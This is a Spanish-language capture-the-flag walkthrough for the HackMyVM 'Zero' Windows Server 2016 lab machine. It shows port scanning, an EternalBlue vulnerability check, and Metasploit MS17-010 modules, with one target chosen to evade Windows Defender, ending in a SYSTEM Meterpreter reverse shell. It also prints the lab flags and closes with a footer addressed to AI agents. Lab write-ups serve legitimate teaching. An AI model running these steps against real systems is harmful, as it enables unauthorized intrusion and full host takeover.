# Zero HackMyVM (Easy - Windows) ## Escaneo de puertos ```shell nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn ``` ```shell nmap -sCV -p ``` Info: ``` Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-27 03:29 EDT Nmap scan report for 192.168.1.155 Host is up (0.00053s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-27 15:29:49Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: zero.hmv, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds (workgroup: ZERO) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: zero.hmv, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49671/tcp open msrpc Microsoft Windows RPC 49695/tcp open msrpc Microsoft Windows RPC MAC Address: 08:00:27:1F:34:01 (Oracle VirtualBox virtual NIC) Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required | smb2-time: | date: 2025-03-27T15:30:37 |_ start_date: 2025-03-27T15:24:26 | smb-os-discovery: | OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3) | Computer name: DC01 | NetBIOS computer name: DC01\x00 | Domain name: zero.hmv | Forest name: zero.hmv | FQDN: DC01.zero.hmv |_ System time: 2025-03-27T08:30:37-07:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: required |_nbstat: NetBIOS name: DC01, NetBIOS user: , NetBIOS MAC: 08:00:27:1f:34:01 (Oracle VirtualBox virtual NIC) |_clock-skew: mean: 10h19m58s, deviation: 4h02m29s, median: 7h59m57s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 94.18 seconds ``` Vemos que no esta alojado ninguna pagina web, pero si vemos que tiene un servidor `SMB`, vemos que es un `Windows Server 2016`, vamos a ver si pudiera ser vulnerable el servidor `SMB` por la version que pudiera tener. > detectVuln.py ```python import subprocess import re from rich.console import Console from rich.panel import Panel def check_smbv1_vulnerability(ip): console = Console() console.print(Panel(f"Escaneando [bold yellow]{ip}[/bold yellow] en busca de vulnerabilidad SMBv1 (EternalBlue)...", title="[bold red]SMB Vulnerability Scan[/bold red]", expand=False)) try: result = subprocess.run(["nmap", "-p", "445", "--script", "smb-vuln-ms17-010", ip], capture_output=True, text=True) if "VULNERABLE" in result.stdout: console.print(Panel("[bold red]¡El sistema es vulnerable a EternalBlue![/bold red] ⚠", title="[bold red]Vulnerabilidad Detectada[/bold red]", expand=False)) else: console.print(Panel("[bold green]El sistema NO es vulnerable a EternalBlue.[/bold green] ✅", title="[bold green]Seguro[/bold green]", expand=False)) except Exception as e: console.print(f"[bold red]Error al ejecutar el escaneo:[/bold red] {e}") if __name__ == "__main__": console = Console() ip = console.input("[bold yellow]Introduce la IP a escanear: [/bold yellow]") check_smbv1_vulnerability(ip) ``` Lo ejecutaremos de la siguiente forma: ```shell python3 detectVuln.py ``` Info: ``` Introduce la IP a escanear: 192.168.1.155 ╭────────────────────────── SMB Vulnerability Scan ──────────────────────────╮ │ Escaneando 192.168.1.155 en busca de vulnerabilidad SMBv1 (EternalBlue)... │ ╰────────────────────────────────────────────────────────────────────────────╯ ╭───────── Vulnerabilidad Detectada ─────────╮ │ ¡El sistema es vulnerable a EternalBlue! ⚠ │ ╰────────────────────────────────────────────╯ ``` Vemos que tiene dicha vulnerabilidad, por lo que vamos a utilizar `metasploit` para esto. ## Escalate Privileges ### Metasploit ```shell msfconsole -q ``` Vamos a utilizar el `exploit` de `eternalblue`: ```shell use exploit/windows/smb/ms17_010_eternalblue ``` Lo configuraremos de la siguiente forma: ```shell set LHOST set LPORT set RHOSTS exploit ``` Info: ``` [*] Started reverse TCP handler on 192.168.1.146:7777 [*] 192.168.1.155:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 192.168.1.155:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2016 Standard Evaluation 14393 x64 (64-bit) [*] 192.168.1.155:445 - Scanned 1 of 1 hosts (100% complete) [+] 192.168.1.155:445 - The target is vulnerable. [*] 192.168.1.155:445 - Connecting to target for exploitation. [+] 192.168.1.155:445 - Connection established for exploitation. [+] 192.168.1.155:445 - Target OS selected valid for OS indicated by SMB reply [*] 192.168.1.155:445 - CORE raw buffer dump (45 bytes) [*] 192.168.1.155:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2 [*] 192.168.1.155:445 - 0x00000010 30 31 36 20 53 74 61 6e 64 61 72 64 20 45 76 61 016 Standard Eva [*] 192.168.1.155:445 - 0x00000020 6c 75 61 74 69 6f 6e 20 31 34 33 39 33 luation 14393 [+] 192.168.1.155:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 192.168.1.155:445 - Trying exploit with 12 Groom Allocations. [*] 192.168.1.155:445 - Sending all but last fragment of exploit packet [*] 192.168.1.155:445 - Starting non-paged pool grooming [+] 192.168.1.155:445 - Sending SMBv2 buffers [+] 192.168.1.155:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 192.168.1.155:445 - Sending final SMBv2 buffers. [*] 192.168.1.155:445 - Sending last fragment of exploit packet! [*] 192.168.1.155:445 - Receiving response from exploit packet [+] 192.168.1.155:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 192.168.1.155:445 - Sending egg to corrupted connection. [*] 192.168.1.155:445 - Triggering free of corrupted buffer. [-] 192.168.1.155:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 192.168.1.155:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 192.168.1.155:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [*] 192.168.1.155:445 - Connecting to target for exploitation. [+] 192.168.1.155:445 - Connection established for exploitation. [+] 192.168.1.155:445 - Target OS selected valid for OS indicated by SMB reply [*] 192.168.1.155:445 - CORE raw buffer dump (45 bytes) [*] 192.168.1.155:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2 [*] 192.168.1.155:445 - 0x00000010 30 31 36 20 53 74 61 6e 64 61 72 64 20 45 76 61 016 Standard Eva [*] 192.168.1.155:445 - 0x00000020 6c 75 61 74 69 6f 6e 20 31 34 33 39 33 luation 14393 [+] 192.168.1.155:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 192.168.1.155:445 - Trying exploit with 17 Groom Allocations. [*] 192.168.1.155:445 - Sending all but last fragment of exploit packet [*] 192.168.1.155:445 - Starting non-paged pool grooming [+] 192.168.1.155:445 - Sending SMBv2 buffers [+] 192.168.1.155:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 192.168.1.155:445 - Sending final SMBv2 buffers. [*] 192.168.1.155:445 - Sending last fragment of exploit packet! [*] 192.168.1.155:445 - Receiving response from exploit packet [+] 192.168.1.155:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 192.168.1.155:445 - Sending egg to corrupted connection. [*] 192.168.1.155:445 - Triggering free of corrupted buffer. [-] 192.168.1.155:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 192.168.1.155:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 192.168.1.155:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [*] 192.168.1.155:445 - Connecting to target for exploitation. [+] 192.168.1.155:445 - Connection established for exploitation. [+] 192.168.1.155:445 - Target OS selected valid for OS indicated by SMB reply [*] 192.168.1.155:445 - CORE raw buffer dump (45 bytes) [*] 192.168.1.155:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2 [*] 192.168.1.155:445 - 0x00000010 30 31 36 20 53 74 61 6e 64 61 72 64 20 45 76 61 016 Standard Eva [*] 192.168.1.155:445 - 0x00000020 6c 75 61 74 69 6f 6e 20 31 34 33 39 33 luation 14393 [+] 192.168.1.155:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 192.168.1.155:445 - Trying exploit with 22 Groom Allocations. [*] 192.168.1.155:445 - Sending all but last fragment of exploit packet [*] 192.168.1.155:445 - Starting non-paged pool grooming [+] 192.168.1.155:445 - Sending SMBv2 buffers [+] 192.168.1.155:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 192.168.1.155:445 - Sending final SMBv2 buffers. [*] 192.168.1.155:445 - Sending last fragment of exploit packet! [*] 192.168.1.155:445 - Receiving response from exploit packet [+] 192.168.1.155:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 192.168.1.155:445 - Sending egg to corrupted connection. [*] 192.168.1.155:445 - Triggering free of corrupted buffer. [-] 192.168.1.155:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 192.168.1.155:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 192.168.1.155:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [*] Exploit completed, but no session was created. ``` Vemos que si es vulnerable, pero por alguna razon esta fallando, por lo que podremos seguir buscando `exploits` asociados a la vulnerabilidad de `MS17-010`, si buscamos por dicha `vulnerabilidad` veremos lo siguiente: ```shell search MS17-010 ``` Info: ``` Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution 2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution 3 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution Interact with a module by name or index. For example info 29, use 29 or use exploit/windows/smb/smb_doublepulsar_rce After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant' ``` Vemos que hay `4` modulos, el primero es el que hemos probado del `ms17_010_eternalblue` vamos a probar el modulo del `ms17_010_psexec`. ```shell use exploit/windows/smb/ms17_010_psexec ``` Ahora lo configuraremos de la siguiente forma: ```shell set LHOST set LPORT set RHOSTS exploit ``` Si dejamos los campos vacios de `SMBUser` y `SMBPass` para hacerlo de forma anonima, pero si lo dejamos asi tal cual el `target` en automatico, veremos lo siguiente: ``` [*] Started reverse TCP handler on 192.168.1.146:4444 [*] 192.168.1.155:445 - Target OS: Windows Server 2016 Standard Evaluation 14393 [*] 192.168.1.155:445 - Built a write-what-where primitive... [+] 192.168.1.155:445 - Overwrite complete... SYSTEM session obtained! [*] 192.168.1.155:445 - Executing the payload... [+] 192.168.1.155:445 - Service start timed out, OK if running a command or non-service executable... [*] Exploit completed, but no session was created. ``` Hace el intento de crear una `reverse shell` pero no lo consigue ya que el `Windows Defender` lo puede estar bloqueando, por lo que vamos a utilizar otro `target` que sea mas discreto. ```shell show targets ``` Info: ``` Exploit targets: ================= Id Name -- ---- 0 Automatic 1 PowerShell => 2 Native upload 3 MOF upload ``` Vamos a utilizar el `Native upload` para subir un archivo de forma automatica y que se nos genere una `reverse shell`: ```shell set target 2 ``` Ahora si lo volvemos a ejecutar con `exploit` veremos lo siguiente: ``` [*] Started reverse TCP handler on 192.168.1.146:4444 [*] 192.168.1.155:445 - Target OS: Windows Server 2016 Standard Evaluation 14393 [*] 192.168.1.155:445 - Built a write-what-where primitive... [+] 192.168.1.155:445 - Overwrite complete... SYSTEM session obtained! [*] 192.168.1.155:445 - Uploading payload... GbsRXBhV.exe [*] 192.168.1.155:445 - Created \GbsRXBhV.exe... [+] 192.168.1.155:445 - Service started successfully... [*] 192.168.1.155:445 - Deleting \GbsRXBhV.exe... [-] 192.168.1.155:445 - Delete of \GbsRXBhV.exe failed: The server responded with error: STATUS_CANNOT_DELETE (Command=6 WordCount=0) [*] Sending stage (177734 bytes) to 192.168.1.155 [*] Meterpreter session 1 opened (192.168.1.146:4444 -> 192.168.1.155:49834) at 2025-03-27 03:57:45 -0400 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM ``` Vemos que ha funcionado y entraremos directamente como `NT AUTHORITY\SYSTEM` por lo que habremos terminado la maquina, leeremos las `flags`. > user.txt ``` HMV{D0nt_r3us3_p4$$w0rd5!} ``` > root.txt ``` HMV{Z3r0_l0g0n_!s_Pr3tty_D4ng3r0u$} ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://dise0.gitbook.io/h4cker_b00k/ctf/hackmyvm/zero-hackmyvm-easy-windows.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.